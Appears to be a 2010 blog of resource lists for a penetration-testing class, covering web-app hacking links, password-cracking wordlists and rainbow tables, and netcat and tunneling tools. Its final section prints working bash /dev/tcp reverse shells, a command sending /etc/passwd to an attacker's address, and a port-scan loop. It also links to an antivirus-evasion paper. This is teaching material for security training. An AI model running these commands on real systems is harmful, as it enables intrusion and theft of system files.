Here are some links I provided to my sec560 students this week for the web application hacking section of the course.
Some of these were part of a list I put together last year which ended up getting posted to the OWASP blog at http://owasp.blogspot.com/2009/12/sql-injection-resources.html, but I've added a few new items as well.
By the way, if you are in the northern New Jersey area & would like to participate in a monthly infosec meeting, my sec560 students & I are going to put together an informal group which will meet monthly in the Parsippany NJ area (most likely at a bar & grill or coffee house) to discuss current industry events, share knowledge & have a few laughs, all are welcome!
Cheers,
RP
Web application hacking resources
Vulnerable WebApps:
OWASPBWA - https://code.google.com/p/owaspbwa/wiki/ProjectSummary
GOAT - http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
MOTH - http://www.bonsai-sec.com/en/research/moth.php
Damn Vulnerable Web App - http://www.dvwa.co.uk/
Gruyere - http://google-gruyere.appspot.com/
Mutillidae - http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Hackme Bank - http://www.foundstone.com/us/resources/proddesc/hacmebank.htm
Hackme Travel - http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm
Hackme Shipping - http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm
Hackme Casino - http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm
Videos & webcasts:
Offensive Python for Web Hackers - http://www.securitytube.net/Offensive-Python-for-Web-Hackers-%28Blackhat%29-video.aspx
OWASP Appsec NYC 2008 - http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference
Caught in the web series - http://www.coresecurity.com/content/ondemand-caught
Invasion of the browser snatchers series - http://www.coresecurity.com/content/on-demand-snatchers
Advanced SQL injection - http://www.irongeek.com/i.php?page=videos/joe-mccray-advanced-sql-injection
Websec 101 - http://www.foundstone.com/us/websec101.asp
Hackme Bank & Hackme Travel videos - http://www.foundstone.com/us/resources-videos.asp
Tools
Samurai Web Testing Framework (Live CD which contains most tools needed to perform a web assessment) - http://samurai.inguardians.com
Google Hacking Database - http://www.hackersforcharity.org/ghdb/
Burpsuite - http://portswigger.net/suite/
W3AF - http://w3af.sourceforge.net/
Samurai plugins for Firefox (lots of great plugins here) - https://addons.mozilla.org/en-US/firefox/collection/samurai
Dirbuster plugin for Firefox - http://www.sittinglittleduck.com/DirBuster-1.0-RC1.xpi
Wikto - http://www.sensepost.com/labs/tools/pentest/wikto
Sqlmap - http://sqlmap.sourceforge.net/
Methodologies & references
OWASP Testing Guide - http://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
OWASP wiki, has lists of attacks with detailed descriptions & syntax - http://www.owasp.org/index.php/Category:Attack
Cheat Sheets
SQL Injection Cheat Sheet - http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
SQL Injection Cheat Sheet - http://michaeldaw.org/sql-injection-cheat-sheet
SQL Injection Cheat Sheet w/ filter evasion - http://ha.ckers.org/sqlinjection/
SQL Injection Cheat Sheets sorted by DB - http://pentestmonkey.net/index.php?option=com_content&task=category&sectionid=9&id=24&Itemid=1
XSS Cheat Sheet w/ filter evasion - http://ha.ckers.org/xss.html
Web App Assessment Cheat Sheet - http://www.secguru.com/files/cheatsheet/webappcheatsheet2.pdf
Books:
Web Application Hackers Handbook - http://portswigger.net/wahh/
SQL Injection Attacks & Defense - http://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597494240
XSS Attacks: Cross Site Scripting Exploits and Defense - https://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/tags-on-product/1597491543
The Oracle Hackers Handbook - http://www.amazon.com/dp/0470080221/ref=nosim?tag=siriusbtechnolog5-20
Whitepapers & slides:
Constricting the Web - Offensive Python for Web Hackers - http://media.blackhat.com/bh-us-10/whitepapers/Hamiel_Wielgoszewski/BlackHat-USA-2010-Hamiel-Wielgosweski-Constricting-the-Web-wp.pdf
OWASP article on Web application penetration testing - http://www.owasp.org/index.php/Web_Application_Penetration_Testing
Advanced SQL injection - http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf
Best of web application penetration testing tools - http://pauldotcom.com/TriplePlay-WebAppPenTestingTools.pdf
(The next two papers are a little old, but still quite useful)
Advanced SQL Injection in SQL Server - http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
(More) Advanced SQL Injection in SQL Server - http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
Thursday, August 26, 2010
Saturday, August 21, 2010
Password cracking resources
Here are a few links to word lists, rainbow tables & other assorted password-cracking-related resources I provided to my sec560 mentor class. It seems to me to be a fairly short list, so I believe I may be omitting a few things. If you notice something missing, let me know & I'll add it in...
Cheers,
RP
http://www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf - BackTrack 4 CUDA guide, crack passwords at lightning speeds using GPUs.
http://www.skullsecurity.org/wiki/index.php/Passwords - Ron Bowes' site (author of SMB* nse scripts) with many different password lists including large lists of leaked passwords from Facebook, MySpace, Rockyou, etc. compromised accounts. Also has analysis of these lists showing most commonly used passwords.
http://download.openwall.net/pub/passwords/ - Collection of password recovery tools.
http://download.openwall.net/pub/wordlists/ - Openwall wordlists (free version), you can buy the full sets here - http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html - Good set of various lists, including male & female names.
http://packetstormsecurity.org/Crackers/wordlists/ - Wordlists comprised of words from different areas of interest (sport, movies, computing, literature, etc.)
http://rainbowtables.shmoo.com/ - Very good set of LANMAN rainbow tables from the Shmoo Group. (about 36GB)
http://www.freerainbowtables.com/en/tables/ntlm/ - Sets of LANMAN, NT & MD5 tables (you can buy them also & have them shipped to you on 1TB or 1.5TB drive)
http://ophcrack.sourceforge.net/tables.php - Much smaller set of LANMAN & NT tables, but pretty effective against most passwords (especially the LANMAN tables). Have to pay for most NT tables though.
Friday, August 13, 2010
/dev/tcp contest
So, I gave my SEC560 mentor class a challenge this week: the student who finds the coolest use for /dev/tcp gets a $10 gift certificate to Starbucks (hey, I'm poor, ok?)
Anyway, I want to extend this out to my millions of readers (hi mom), the most creative use of /dev/tcp wins a $10 Starbucks gift certificate, a handful of EFF stickers & anything else interesting I can find in my desk.
Good luck & remember "If you're not playing the game, the game is playing you"
Resources on netcat, /dev/tcp, tunneling, etc.
Here are a few more resources I provided to my SANS SEC560 mentor class. The main topic of this week's session was netcat (with a bit of /dev/tcp thrown in for good measure) &, as usual, the conversation strayed into other ways to redirect & tunnel traffic, so you'll find some resources in that regard below.
I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.
Enjoy!
Ed Skoudis - Crazy Ass Netcat Relays for Fun & Profit: http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy-Ass_Netcat_Relays_for_Fun_and_Profit
Ed Skoudis - Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/coresecurity/PenTestingNinjitsuSeries.html
Ed Skoudis / Josh Wright / Kevin Johnson - Penetration Testing Perfect Storm parts 1-3 - http://na-d.marketo.com/lp/coresecurity/PenTestingPerfectStormSeries.html
Ed Skoudis / Josh Wright / Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/coresecurity/PerfectStormPart4.html
Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/coresecurity/InvasionoftheBrowserSnatchersSeries.html
The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf
HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.html
Netcat variants:
Ncat: http://nmap.org/ncat/
Socat: http://www.dest-unreach.org/socat/
Cryptcat: http://cryptcat.sourceforge.net/info.php
DNScat: http://tadek.pietraszek.org/projects/DNScat/
Also, here are some awesome tunneling & proxying tools
PTunnel - http://www.cs.uit.no/~daniels/PingTunnel/
Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies
Stunnel - http://www.stunnel.org/
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL
Proxytunnel - http://proxytunnel.sourceforge.net/
Creates tunnels using HTTP and HTTPS proxies (that understand the HTTP CONNECT command). Works as a back-end driver for an OpenSSH client, creating SSH connections through HTTP(S) proxies.
The included paper is a REALLY good read as well - http://proxytunnel.sourceforge.net/paper.php
ProxyChains - http://proxychains.sourceforge.net/
This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.
BASH connect back shell using /dev/tcp from http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
GnuCitizen User Link
Attack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis User Link
Attack Box: nc -l -p Port -vvv
Victim: $ exec 0<>/dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0<&0 1>&0 2>&0
Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:
Linux
• /dev/tcp rocks!
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port], which opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
$ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor
$ /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered
Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
$ echo > /dev/tcp/[IPaddr]/[port]
Storing Results and Iterating
• But, it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running